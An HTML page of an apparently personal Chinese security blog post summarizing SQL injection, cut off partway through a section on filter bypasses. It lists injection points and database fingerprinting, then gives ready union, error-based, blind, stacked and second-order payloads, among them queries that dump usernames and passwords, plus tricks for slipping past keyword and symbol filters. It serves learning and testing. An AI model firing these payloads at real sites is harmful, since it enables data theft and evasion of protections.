

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/mad.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="i4G5d">
  <meta name="keywords" content="">
  
    <meta name="description" content="做为作为基础，也最为重要的漏洞之一，这里总结SQL注入 SQLI原理： 形成原因： ​    当web应用向后台数据库传递SQL语句进行数据库操作时，如果对用户输入的参数没有经过严格的过滤处理，那么攻击者就可以构造特殊的SQL语句，直接输入数据库引擎执行，获取或修改数据库中的数据。  本质： ​    用户能控制输入的内容； web应用把用户输入的内容带入到数据库当代码执行；   SQL注入思">
<meta property="og:type" content="article">
<meta property="og:title" content="SQLI">
<meta property="og:url" content="https://i4g5d.github.io/2025/10/23/SQLI/index.html">
<meta property="og:site_name" content="i4G5d-Blog">
<meta property="og:description" content="做为作为基础，也最为重要的漏洞之一，这里总结SQL注入 SQLI原理： 形成原因： ​    当web应用向后台数据库传递SQL语句进行数据库操作时，如果对用户输入的参数没有经过严格的过滤处理，那么攻击者就可以构造特殊的SQL语句，直接输入数据库引擎执行，获取或修改数据库中的数据。  本质： ​    用户能控制输入的内容； web应用把用户输入的内容带入到数据库当代码执行；   SQL注入思">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i4g5d.github.io/2025/10/23/SQLI/80d2a4ffaa0cb7d7d1db82770ccdf1cf.png">
<meta property="og:image" content="https://i4g5d.github.io/2025/10/23/SQLI/image-20251024195214666.png">
<meta property="article:published_time" content="2025-10-23T09:06:43.000Z">
<meta property="article:modified_time" content="2025-10-24T12:48:54.899Z">
<meta property="article:author" content="i4G5d">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://i4g5d.github.io/2025/10/23/SQLI/80d2a4ffaa0cb7d7d1db82770ccdf1cf.png">
  
  
  
  <title>SQLI - i4G5d-Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"i4g5d.github.io","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":4},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 8.0.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>i4G5d</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="SQLI"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-10-23 17:06" pubdate>
          2025年10月23日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          7.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          60 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">SQLI</h1>
            
            
              <div class="markdown-body">
                
                <p>  做为作为基础，也最为重要的漏洞之一，这里总结SQL注入</p>
<h2 id="SQLI原理："><a href="#SQLI原理：" class="headerlink" title="SQLI原理："></a>SQLI原理：</h2><ol>
<li><p>形成原因：</p>
<p>​    当web应用向后台数据库传递<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=SQL%E8%AF%AD%E5%8F%A5&spm=1001.2101.3001.7020">SQL语句</a>进行数据库操作时，如果对用户输入的参数没有经过严格的过滤处理，那么攻击者就可以构造特殊的SQL语句，直接输入数据库引擎执行，获取或修改数据库中的数据。</p>
</li>
<li><p>本质：</p>
<p>​    用户能控制输入的内容； web应用把用户输入的内容带入到数据库当代码执行；</p>
</li>
</ol>
<h2 id="SQL注入思路："><a href="#SQL注入思路：" class="headerlink" title="SQL注入思路："></a>SQL注入思路：</h2><h3 id="1-判断可靠输入点"><a href="#1-判断可靠输入点" class="headerlink" title="1. 判断可靠输入点"></a>1. 判断可靠输入点</h3><ol>
<li><p>GET&#x2F;POST参数</p>
<p>要判断我们传入的参数如何和数据库交互，判断如何闭</p>
</li>
<li><p>Cookie</p>
<p>有些网站通过查询cookie判断用户是否登录，需要与数据库进行交互，我们可以修改cookie的值，查找我们所需要的东西。或者通过报错注入是网页返回报错信息。</p>
</li>
<li><p>Referer注入</p>
<p>有些网站会记录ip和访问路径，例如百度就是通过Referer来统计网站流量，我们将访问路径进行SQL注入，同样也可以得到想要的信息。</p>
</li>
<li><p>XFF注入</p>
<p>在用户登录注册模块在 HTTP 头信息添加 X-Forwarded-for: 9.9.9.9’ ，用户在注册的时候，如果存在安全隐患，会出现错误页面或者报错。从而导致注册或者登录用户失败。</p>
</li>
<li><p>UA注入</p>
</li>
</ol>
<h3 id="2-判断库类型"><a href="#2-判断库类型" class="headerlink" title="2. 判断库类型"></a>2. 判断库类型</h3><p>​	常见数据库就是MYSQL(3306)，SQLserver(1443)，Oracle(1521)，SQLite(无),PostgreSQL(5432)。</p>
<p>​	判断方法主要就是</p>
<ul>
<li><p>数据库特有的函数</p>
<table>
<thead>
<tr>
<th>数据库</th>
<th>特有函数</th>
<th>示例 payload</th>
<th>判断逻辑</th>
</tr>
</thead>
<tbody><tr>
<td><strong>MySQL</strong></td>
<td><code>version()</code>、<code>database()</code>、<code>sleep()</code></td>
<td><code>&#39; UNION SELECT version()--+</code></td>
<td>如果返回类似 <code>8.0.33</code> → 确认是 MySQL</td>
</tr>
<tr>
<td><strong>PostgreSQL</strong></td>
<td><code>current_database()</code>、<code>pg_sleep()</code>、<code>VERSION()</code></td>
<td><code>&#39; UNION SELECT pg_sleep(5)--+</code></td>
<td>页面延迟 5 秒 → PostgreSQL</td>
</tr>
<tr>
<td><strong>SQL Server</strong></td>
<td><code>@@version</code>、<code>db_name()</code>、<code>waitfor delay</code></td>
<td><code>&#39; UNION SELECT @@version--+</code></td>
<td>返回 “Microsoft SQL Server” 或延迟 5 秒</td>
</tr>
<tr>
<td><strong>Oracle</strong></td>
<td><code>banner</code> from <code>v$version</code>、<code>dbms_pipe.receive_message</code></td>
<td><code>&#39; UNION SELECT banner FROM v$version--+</code></td>
<td>报错&#x2F;回显包含 “Oracle Database”</td>
</tr>
<tr>
<td><strong>SQLite</strong></td>
<td><code>sqlite_version()</code></td>
<td><code>&#39; UNION SELECT sqlite_version()--+</code></td>
<td>返回 <code>3.x.x</code></td>
</tr>
</tbody></table>
</li>
<li><p>数据库专属符号来判断，如注释符号、多语句查询符等等</p>
<table>
<thead>
<tr>
<th>特征类型</th>
<th>MySQL</th>
<th>SQL Server</th>
<th>Oracle</th>
<th>PostgreSQL</th>
<th>SQLite</th>
</tr>
</thead>
<tbody><tr>
<td><strong>单行注释</strong></td>
<td><code>--+</code> 或 <code>#</code></td>
<td><code>--+</code></td>
<td><code>--+</code></td>
<td><code>--+</code></td>
<td><code>--+</code></td>
</tr>
<tr>
<td><strong>多语句执行</strong></td>
<td><code>;</code></td>
<td><code>;</code></td>
<td>不支持（默认）</td>
<td>支持</td>
<td>支持</td>
</tr>
<tr>
<td><strong>字符串连接符</strong></td>
<td><code>concat(&#39;a&#39;,&#39;b&#39;)</code></td>
<td><code>&#39;a&#39;+&#39;b&#39;</code></td>
<td>&#96;’a’</td>
<td></td>
<td>‘b’&#96;</td>
</tr>
</tbody></table>
</li>
<li><p>报错信息</p>
</li>
<li><p>其他数据库特性</p>
</li>
</ul>
<p>​	</p>
<h3 id="3-判断参数类型"><a href="#3-判断参数类型" class="headerlink" title="3.判断参数类型"></a>3.判断参数类型</h3><p>​	通过+1，-1，and，or，注释符的组合进行刺探。（数值型，字符型，闭合类型）</p>
<ul>
<li>id&#x3D;1 and 1&#x3D;1回显正常            id&#x3D;1 and1&#x3D;2回显错误（判断为整形）</li>
<li>id&#x3D;1 and 1&#x3D;1和id&#x3D;1 and 1&#x3D;2回显正常（判断为字符型接下来判断闭合方式）</li>
<li>id&#x3D;1’ and ‘1’&#x3D;’1回显正确         id&#x3D;1’ and ‘1’&#x3D;’2回显错误（判断为【’】闭合）</li>
<li>id&#x3D;1” and “1”&#x3D;”1 回显正常     id&#x3D;1” and “1”&#x3D;”2回显错误（判断为【”】闭合）</li>
<li>SQL语法支持一个或多个「括号」包裹参数，上述三种都可能带个括号。</li>
</ul>
<h3 id="4-判断过滤"><a href="#4-判断过滤" class="headerlink" title="4.判断过滤"></a>4.判断过滤</h3><p>已经确定的库类型，注入参数类型，就可以开始注入了，但过滤是肯定存在的。</p>
<ul>
<li>参数会有过滤</li>
<li>没有显示位；就考虑报错注入或者时间注入</li>
<li>没有报错信息；就不能报错注入</li>
</ul>
<h3 id="5-注入方式"><a href="#5-注入方式" class="headerlink" title="5.注入方式"></a>5.注入方式</h3><h4 id="联合注入"><a href="#联合注入" class="headerlink" title="联合注入"></a>联合注入</h4><p>​	前提要有回显，要先查到列数；</p>
<ol>
<li><p>判断列数 </p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">order</span> <span class="hljs-keyword">by</span> <span class="hljs-number">3</span>；<br>id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span>;<br></code></pre></td></tr></table></figure>
</li>
<li><p>看看这几列的回显位置</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,<span class="hljs-number">3</span>  <br></code></pre></td></tr></table></figure>
</li>
<li><p>查库名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">id<span class="hljs-operator">=</span><span class="hljs-number">-1</span><span class="hljs-string">&#x27; union select 1,2,database() --+  </span><br><span class="hljs-string">id=-1&#x27;</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(schema_name) <span class="hljs-keyword">from</span> information_schema.schemata <span class="hljs-comment">--+</span><br></code></pre></td></tr></table></figure>

<details>     <summary>**关于将id值设置为0或者负数的解释**</summary>          
    由于我们的语句是插入到原有语句后面，这样就会出现两个SQL语句同时执行，由于SQL查询会默认返回一行数据，所以我们插入的第二行语句的结果就不会被返回，只会返回原有的SQL语句的查询内容。 要让数据库查询我们插入的语句，需要让原有SQL语句产生查询错误，注意：查询错误不是语法错误，查询错误只会返回空，不会让语句报错。 所以我们可以使id=0或id=-1，零或负数不会被用作id值，它插入进去一定导致原有SQL语句查询结果为空，我们插入的SQL语句的结果就会被返回。 </details>
</li>
<li><p>查表名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql">id<span class="hljs-operator">=</span><span class="hljs-number">-1</span><span class="hljs-string">&#x27; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+</span><br><span class="hljs-string">或把table_name换成具体表名：</span><br><span class="hljs-string">id=-1&#x27;</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(table_name) <span class="hljs-keyword">from</span> information_schema.tables <span class="hljs-keyword">where</span> table_schema<span class="hljs-operator">=</span><span class="hljs-string">&#x27;name&#x27;</span> <span class="hljs-comment">--+</span><br>(去掉引号用HEX编码)<br></code></pre></td></tr></table></figure>
</li>
<li><p>查字段名和具体数据</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">id<span class="hljs-operator">=</span><span class="hljs-number">-1</span><span class="hljs-string">&#x27; union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=&#x27;</span>name<span class="hljs-string">&#x27;</span><br><span class="hljs-string">id=-1&#x27;</span> <span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-number">1</span>,<span class="hljs-number">2</span>,group_concat(username,password) <span class="hljs-keyword">from</span> users <span class="hljs-comment">--+</span><br></code></pre></td></tr></table></figure></li>
</ol>
<h4 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h4><p>​	前提：页面会显示数据库报错信息。</p>
<p>​	<code>updatexml()</code>（<code>extractvalue</code>） 在 MySQL 中用于对 XML 数据执行 XPath 操作。它的调用签名像 <code>updatexml(xml_doc, xpath_expr, new_value)</code>。当第二个参数（xpath 表达式）不是合法的 XPath 或无法解析时，MySQL 会抛出一个错误，并且错误信息会包含供解析的那个字符串（也就是我们传入的 <code>concat(...)</code> 的结果）。</p>
<ol>
<li><p>查库名</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sql">id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27; and updatexml(1,concat(0x7e,database(),0x7e),1) --+</span><br><span class="hljs-string">id=1&#x27;</span> <span class="hljs-keyword">and</span> (<span class="hljs-keyword">select</span> <span class="hljs-number">1</span> <span class="hljs-keyword">from</span> (<span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(<span class="hljs-operator">*</span>),concat((database()),<span class="hljs-built_in">floor</span> (rand(<span class="hljs-number">0</span>)<span class="hljs-operator">*</span><span class="hljs-number">2</span>))x <span class="hljs-keyword">from</span> information_schema.tables <span class="hljs-keyword">group</span> <span class="hljs-keyword">by</span> x)a) <span class="hljs-comment">--+</span><br>id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27; and updatexml(1,concat(0x7e,(select group_concat(schema_name)from information_schema.schemata),0x7e),1) --+</span><br></code></pre></td></tr></table></figure></li>
</ol>
<h3 id="（时间-布尔）盲注"><a href="#（时间-布尔）盲注" class="headerlink" title="（时间&#x2F;布尔）盲注"></a>（时间&#x2F;布尔）盲注</h3><p>​	因为是盲猜，所以无论是布尔还是时间都会很慢</p>
<p>​	盲注主要是通过if语句去一个一个猜个数，猜字符。所以时间盲注只不过是把布尔盲注的响应换成sleep时间，所以下面主要以时间盲注为例</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">if(条件,<span class="hljs-literal">true</span>,<span class="hljs-literal">false</span>)；substr(str,<span class="hljs-keyword">from</span>,length)；limit 选填偏移量 行数；<br></code></pre></td></tr></table></figure>

<ol>
<li><p>爆库个数</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> if((<span class="hljs-keyword">select</span> <span class="hljs-built_in">count</span>(schema_name) <span class="hljs-keyword">from</span> information_schema.schemata)<span class="hljs-operator">=</span><span class="hljs-number">9</span>,sleep(<span class="hljs-number">5</span>),<span class="hljs-number">1</span>)<br></code></pre></td></tr></table></figure>

<ol start="2">
<li>一个个爆库名长度</li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> if((<span class="hljs-keyword">select</span> length(schema_name) <span class="hljs-keyword">from</span> information_schema.schemata limit0,<span class="hljs-number">1</span>)<span class="hljs-operator">=</span><span class="hljs-number">18</span>,sleep(<span class="hljs-number">5</span>),<span class="hljs-number">1</span>)<br></code></pre></td></tr></table></figure>

<ol start="3">
<li>在知道长度基础上一个一个判断字符</li>
</ol>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs sql">id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> if((<span class="hljs-keyword">select</span> ascii(substr((<span class="hljs-keyword">select</span> schema_name <span class="hljs-keyword">from</span> information_schema.schemata limit0,<span class="hljs-number">1</span>),<span class="hljs-number">1</span>,<span class="hljs-number">1</span>)))<span class="hljs-operator">=</span><span class="hljs-number">105</span>,sleep(<span class="hljs-number">5</span>),<span class="hljs-number">1</span>)<br><br>id<span class="hljs-operator">=</span><span class="hljs-number">1</span> <span class="hljs-keyword">and</span> if(substr((<span class="hljs-keyword">select</span> schema_name <span class="hljs-keyword">from</span> information_schema.schemata limit0,<span class="hljs-number">1</span>),<span class="hljs-number">2</span>,<span class="hljs-number">1</span>)<span class="hljs-operator">=</span><span class="hljs-number">110</span>,sleep(<span class="hljs-number">5</span>),<span class="hljs-number">1</span>)<span class="hljs-operator">/</span><span class="hljs-operator">/</span>判断第一个库第二个字符，更简洁的写法<br></code></pre></td></tr></table></figure>

<p>这样下来就能一个一个猜出数据库，随后就是和联合注入说的一样的思路去猜表数，猜表名，猜字段名，猜字段</p>
<p>查当前库就简单一点</p>
</li>
</ol>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">id</span>=<span class="hljs-number">1</span>&#x27; and if((length(database()))=<span class="hljs-number">7</span>,sleep(<span class="hljs-number">5</span>),<span class="hljs-number">1</span>) --+  查库长度<br><span class="hljs-attribute">id</span>=<span class="hljs-number">1</span>&#x27; and if((select count(*) from information_schema.tables where table_schema=database())=<span class="hljs-number">1</span>,sleep(<span class="hljs-number">5</span>),<span class="hljs-number">1</span>)--+ 查表数量<br></code></pre></td></tr></table></figure>

<p>​	其实抽象起来就这几个</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs stylus">id=<span class="hljs-number">1</span> and <span class="hljs-built_in">if</span>(       <span class="hljs-selector-tag">select</span> <span class="hljs-built_in">count</span>(*) 查个数         ,<span class="hljs-built_in">sleep</span>(<span class="hljs-number">2</span>),<span class="hljs-number">1</span>)<br>id=<span class="hljs-number">1</span> and <span class="hljs-built_in">if</span>(       <span class="hljs-selector-tag">select</span> <span class="hljs-built_in">length</span>() limit 查长度     ,<span class="hljs-built_in">sleep</span>(<span class="hljs-number">5</span>),<span class="hljs-number">1</span> )<br>id=<span class="hljs-number">1</span> and <span class="hljs-built_in">if</span>(       <span class="hljs-built_in">substr</span>(  (<span class="hljs-selector-tag">select</span> limit语句)  <span class="hljs-number">1</span>,<span class="hljs-number">1</span>)  查字符     ， <span class="hljs-built_in">sleep</span>(<span class="hljs-number">5</span>),<span class="hljs-number">1</span> )<br></code></pre></td></tr></table></figure>



<h4 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h4><p>​	当注入点使用的执行函数允许一次性执行多个 SQL 语句的时候，例如 PHP 中的 <code>multi_muti_query</code>或者PDO，堆叠注入即存在。堆叠注入相较于其他方式，利用的手法更加自由，不局限于原来的 SELECT 语句，而可以拓展到 INSERT、SHOW、SET、UPDATE 语句等。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">id<span class="hljs-operator">=</span><span class="hljs-number">1</span><span class="hljs-string">&#x27;;show tables--+</span><br><span class="hljs-string">id=1&#x27;</span>;<span class="hljs-keyword">select</span> sleep(<span class="hljs-number">5</span>)_<span class="hljs-comment">--+</span><br></code></pre></td></tr></table></figure>



<h4 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h4><p>​	部分网站在代码层面上对sql注入的防御通常是写一个无敌的过滤器出来，自定义为安全函数。然后所有用户传入的参数都经过这个安全函数处理。</p>
<p>​	于是攻击者把payload先存入数据库，然后在另一处调出这个payload，以此触发payload。</p>
<p>​	设计者忽视没有经过用户传参的sql语句，就达成了二次注入</p>
<p>​	比如注册一个用户名为**admin’ #**的用户，注册时并无SQL注入，修改密码时的SQL语句为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sqlite">update user set password=&#x27;$password&#x27; where username=&#x27;admin&#x27; #&#x27;<br></code></pre></td></tr></table></figure>

<p>​	导致越权修改了admin的密码。由于二次注入利用链比较长，更容易被开发忽视，但往往黑盒很难测试出来，需要代码审计。</p>
<h3 id="6-绕过过滤"><a href="#6-绕过过滤" class="headerlink" title="6. 绕过过滤"></a>6. 绕过过滤</h3><h4 id="1-通用绕过关键字方"><a href="#1-通用绕过关键字方" class="headerlink" title="1. 通用绕过关键字方"></a>1. 通用绕过关键字方</h4><p>（1）<code>/**/</code> <code>&lt;&gt;</code>分割</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs sql">sel<span class="hljs-operator">&lt;&gt;</span>ect<br>sel<span class="hljs-comment">/**/</span>ect<br></code></pre></td></tr></table></figure>

<p>（2）大小混写和双写</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">selselectect</span>     <br>sElcT    比如MYSQL大小写不敏感，但WAF的过滤函数大小写敏感<br></code></pre></td></tr></table></figure>

<p>（3）编码</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown">url编码绕过<br>16进制编码绕过<br>ASCII编码绕过<br></code></pre></td></tr></table></figure>

<h4 id="2-绕过符号过滤"><a href="#2-绕过符号过滤" class="headerlink" title="2. 绕过符号过滤"></a>2. 绕过符号过滤</h4><p>（1）逗号</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">union</span> <span class="hljs-keyword">select</span> <span class="hljs-operator">*</span> <span class="hljs-keyword">from</span> (<span class="hljs-keyword">select</span> <span class="hljs-number">1</span>)a <span class="hljs-keyword">join</span> (<span class="hljs-keyword">select</span> <span class="hljs-number">2</span>)b <span class="hljs-keyword">join</span> (<span class="hljs-keyword">select</span> <span class="hljs-number">3</span>)  <span class="hljs-comment">-- join代替</span><br><span class="hljs-comment">-- 盲注中</span><br>substr(str <span class="hljs-keyword">from</span> pos <span class="hljs-keyword">for</span> len) <span class="hljs-comment">--在str中从第pos位截取len长的字符</span><br>mid(str <span class="hljs-keyword">from</span> pos <span class="hljs-keyword">for</span> len) <span class="hljs-comment">--在str中从第pos位截取len长的字符</span><br>limit <span class="hljs-number">1</span> <span class="hljs-keyword">offset</span> <span class="hljs-number">1</span><br><span class="hljs-built_in">substring</span>(str <span class="hljs-keyword">from</span> pos) <span class="hljs-comment">--返回字符串str的第pos个字符，索引从1开始</span><br></code></pre></td></tr></table></figure>

<p>（2）空格</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql">（<span class="hljs-number">1</span>）双空格 <br>（<span class="hljs-number">2</span>）<span class="hljs-comment">/**/</span> <br>（<span class="hljs-number">3</span>）用括号绕过 <br>（<span class="hljs-number">4</span>）<span class="hljs-operator">%</span><span class="hljs-number">20</span> <span class="hljs-operator">%</span><span class="hljs-number">09</span> <span class="hljs-operator">%</span><span class="hljs-number">0</span>a <span class="hljs-operator">%</span><span class="hljs-number">0</span>b <span class="hljs-operator">%</span><span class="hljs-number">0</span>c <span class="hljs-operator">%</span><span class="hljs-number">0</span>d <span class="hljs-operator">%</span>a0 <span class="hljs-operator">%</span><span class="hljs-number">00</span> 等不可见字符<br></code></pre></td></tr></table></figure>

<p>（3）等号</p>
